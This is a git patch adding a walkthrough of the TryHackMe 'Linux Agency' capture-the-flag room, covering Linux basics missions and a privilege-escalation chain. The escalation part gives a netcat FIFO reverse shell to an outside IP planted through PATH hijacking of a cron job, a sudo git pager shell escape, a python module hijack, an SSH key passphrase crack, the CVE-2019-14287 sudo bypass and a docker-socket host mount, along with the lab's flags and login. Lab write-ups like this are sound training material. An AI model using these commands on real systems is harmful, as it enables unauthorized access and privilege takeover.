From 0f8d25de3b2b8267be37253102f699c7e0c19746 Mon Sep 17 00:00:00 2001
From: AbdullahRizwan101 <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Sun, 31 Jan 2021 13:35:51 +0500
Subject: [PATCH] Add files via upload
---
TryHackMe/Linux_Agency.md | 532 ++++++++++++++++++++++++++++++++++++++
1 file changed, 532 insertions(+)
create mode 100644 TryHackMe/Linux_Agency.md
diff --git a/TryHackMe/Linux_Agency.md b/TryHackMe/Linux_Agency.md
new file mode 100644
index 0000000..13a3d27
--- /dev/null
+++ b/TryHackMe/Linux_Agency.md
@@ -0,0 +1,532 @@
+# TryHackMe-Linux Agency
+
+First we are told to ssh into the box using the creds
+
+username:agent47
+password:640509040147
+
+
+
+
+
+## Linux Fundamentals
+
+### Mission 1 Flag
+
+As from the ssh banner we got the flag for mission 1
+
+### Mission 2 Flag
+
+Use the previous flag to login to `mission1` user
+
+
+
+In mission1's home directory you will find the flag for mission2 and you can the login with it to next user or in this case next mission
+
+
+
+### Mission 3 flag
+
+
+
+Going to mission'2 home directory you will see `flag.txt` which holds flag for this mission
+
+
+
+### Mission 4 flag
+
+Switch user to mission3 with the previous flag found
+
+
+
+
+
+It seems there is no flag in the text file this time so we need to search around for the flag
+
+Running `grep -rnw /home -e 'mission4'` I saw end of the flag in the same message
+
+
+
+Opening it with `vi` editor I found the flag
+
+
+
+### Mission 5 flag
+
+Switch user to mission4 with the flag found
+
+
+
+Head over to mission's 5 home directory
+
+
+
+And you'll find flag for the next mission
+
+### Mission 6 flag
+
+
+
+
+
+### Mission 7 flag
+
+
+
+
+
+This was quite easy because all we have to do is `ls -la`
+
+### Mission 8 flag
+
+Using the previous flag switch to mission7 user
+
+
+
+
+
+### Mission 9 flag
+
+
+
+
+
+There was no flag in the home directory let's see if we can find anything in root directory (/)
+
+
+
+### Mission 10 flag
+
+
+
+
+
+We only see `rockyou.txt`
+
+Doing a grep for `mission10` you will find your flag
+
+
+
+### Mission 11 flag
+
+
+
+
+
+We see a bunch of directories in mission10's home directory so we have to look for mission11 string in these directories
+
+
+
+### Mission 12 flag
+
+
+
+Reading `.bashrc`
+
+
+
+
+### Mission 13 flag
+
+
+
+`flag.txt` is in home directory of mission13 but it doesn't have any permission so use chmod to change permissions
+
+
+
+
+### Mission 14 flag
+
+
+
+
+
+### Mission 15 flag
+
+
+
+
+
+This is looking like stream of binary so let's hop over to cyberchef
+
+
+
+
+### Mission 16 flag
+
+
+
+
+
+
+This representation looks like hex because of `D` in the string
+
+
+
+### Mission 17 flag
+
+
+
+
+
+Here we have a `flag` binary but doesn't have any permissions so set execute flag on the binary
+
+
+
+### Mission 18 flag
+
+
+
+
+
+It seems we have an ecnrypted string and which is being decrpyted so we need to run the java file to get the flag
+
+
+
+### Mission 19 flag
+
+
+
+
+
+Here we have the same scenario but it is written in `ruby` language
+
+
+
+### Mission 20 flag
+
+
+
+
+
+Again same thing we need to compile the c program and run it
+
+
+
+### Mission 21 flag
+
+
+
+
+
+
+
+### Mission 22 flag
+
+
+
+
+
+Again the flag is hidden in `.bashrc`
+
+### Mission 23 flag
+
+
+
+We get spawn into a python interactive shell
+
+
+
+
+
+### Mission 24 flag
+
+
+
+
+
+We get a message from text file but I didn't get it until I saw `/etc/hosts`
+
+
+
+Where localhost was resolving into `mission24.com` which tells that there is a webpage
+
+
+
+### Mission 25 flag
+
+
+
+
+
+Here `bribe` is a binary file so on running
+
+
+
+Transfer the binary to your machine for analyzing
+
+
+
+
+
+Right in the beginning we can it's storing an evniromental variable in a variable named `_s1` and it's checking if it contains the string "money" so we just have to export a variable named pocket with value money in terminal
+
+
+
+
+### Mission 26 flag
+
+
+
+This tells me that there is something wrong with the PATH so let's export the PATH
+
+
+
+
+
+### Mission 27 flag
+
+
+
+
+
+Running the `strings` command on the jpg file we will get our flag
+
+
+
+### Mission 28 flag
+
+
+
+
+
+Extract the archive (gzip) file I have transfered it to my machine
+
+
+
+Then use hexeditor to view the content in the jpg file which is acutally a gif image file
+
+
+
+### Mission 29 flag
+
+
+
+
+
+This `irb` is a ruby prompt
+
+
+
+
+
+
+### Mission 30 flag
+
+
+
+
+
+
+### Vikto's Flag
+
+
+
+
+
+viktor{b52c60124c0f8f85fe647021122b3d9a}
+
+## Privilege Escalation
+
+### What is dalia's flag?
+
+
+
+
+
+We can see a cronjob in which script is running as user `dalia`
+
+But when we try to overwrite the content of the `47.sh` script it will not be executed because it is being paused with sleep 30 which wil pause the execution for 30 seconds and at the same the the same script will be overwritten as a root user and then the ownership will be changed to `viktor` so we need to somehow prevent the `sleep` command so we exploit PATH variable and replace the sleep command with anything
+
+
+
+Here as you can see I made a sleep file in which I just added a `bash` command which will not spawn a shell but will overwrite the actual sleep command
+
+Added PATH variable for that file
+
+
+
+rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.2.54.209 1234 >/tmp/f
+
+Add a netcat reverse shell
+
+
+
+
+
+And boom we get a shell as user `dalia`
+
+
+### What is silvio's flag?
+
+Doing `sudo -l`
+
+
+
+We can see that this user can run `zip` as user `silvio`
+
+
+
+
+
+silvio{657b4d058c03ab9988875bc937f9c2ef}
+
+### What is reza's flag?
+
+Running `sudo -l` on this user
+
+
+
+Now we will be able to escalate our privileges to rez through `git`
+
+
+
+```
+sudo -u reza PAGER='sh -c "exec sh 0<&1"' /usr/bin/git -p help
+
+```
+
+
+
+
+reza{2f1901644eda75306f3142d837b80d3e}
+
+### What is jordan's flag?
+
+
+
+Now this time we can run a python script as user `jordan`
+
+
+
+On running we get an error because there is no python module named `shop`. What we can do is create a python module in the same directory where the script is and in it spawn a shell.
+
+```
+echo 'import os;os.system("/bin/bash")' > shop.py
+```
+But what is happening with SETENV is that it's setting the PYTHONPATH to default `SETENV: NOPASSWD: /opt/scripts/Gun-Shop.py` which will lead us to PYTHONPATH Hijacking
+
+
+
+
+
+### What is ken's flag?
+
+
+
+Here we can see less can be run as user `ken` so we can utilize to escalate our privileges
+
+
+
+
+
+
+
+
+
+### What is sean's flag?
+
+
+
+This one is pretty easy similar to less and this is one of the most common privilege escaltion we encounter in CTF's
+
+
+
+Then just do `!/bin/sh`
+
+
+
+
+
+But we don't see any flag here. Looking at the groups for sean we see that he belongs to `adm` which can look on system logs
+
+
+
+
+
+### What is penelope's flag?
+
+Switch user to `penelope` with the password found in the logs which is base64 enccoded p3nelope
+
+
+
+
+
+### What is maya's flag?
+
+Since that `base64` binary has an SUID so we can read any file by encoding it through base64 and then decoding it
+
+
+
+### What is robert's Passphrase?
+
+
+
+
+
+We see ssh keys , if your faimilar with ssh keys usually when we login with id_rsa it can sometimes be protected with a passpharse so let's transfer the private key to our machine and give it to ssh2john so we can get a hash and then crack it with johntheripper
+
+
+
+
+
+
+
+And we found the passphrase!. industryweapon
+
+
+
+### What is user.txt?
+
+Here it says about `entrypoint at localhost`
+
+
+
+We can see 2 local ports that is intersting , we already saw port 80 now lets see what service is running on port 2222
+
+
+
+SSH is running so we can try to login as `robert ` using the private key along with the passphrase
+
+
+
+
+
+Checking for what robert can run as a superuser in docker environment
+
+
+
+Since sudo version is 1.8.21 and we can see there is `!` in sudoers there is a CVE for this which is `CVE-2019-14287 `
+
+
+
+
+
+### What is root.txt?
+
+
+
+When we try to see what is the image name for docker conatainer we get a permission denied
+
+
+
+To overcome this we need change permisisons of docker.sock which is used to communicate with the main docker daemon (process) by default. It is the entry point for a Docker API. This socket is used by Docker CLI by default to execute docker commands. Default location for the socket is `/run/docker.sock`
+
+
+
+Now if we do `docker images`
+
+
+
+We can see the name so now we can mount the host file system on the docker container
+
+
+
+
+### Becoming root on the host machine
+
+Since we have mounted the host file system on the docker container and we are root we can pretty much do anything , for example if I modify sudoers file it will take effect on the actual host machine so what we can do is edit the maya user's premisison to let me execute anything
+
+
+
+
\ No newline at end of file